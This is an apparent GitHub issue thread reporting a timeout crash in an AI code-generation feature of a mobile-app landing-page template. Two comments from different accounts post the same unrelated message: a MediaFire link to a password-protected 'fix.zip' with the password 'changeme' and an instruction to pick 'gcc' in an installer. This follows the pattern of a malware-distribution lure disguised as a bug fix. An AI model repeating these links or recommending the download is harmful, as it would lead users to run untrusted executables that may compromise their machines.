### ISSUE TITLE
Connection Timeout Error Leading to Service Crash When Using ai generate code Feature

### ISSUE THREAD

**Issue by swk777** [swk777/Mobile-app-landingpage-template#3]
Steps to Reproduce
1. click the "edit cell using ai" button
2. fill in the prompt.
3. click the "generate" button.

![Uploading Screenshot 2024-08-26 at 15.49.57.png…]()

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
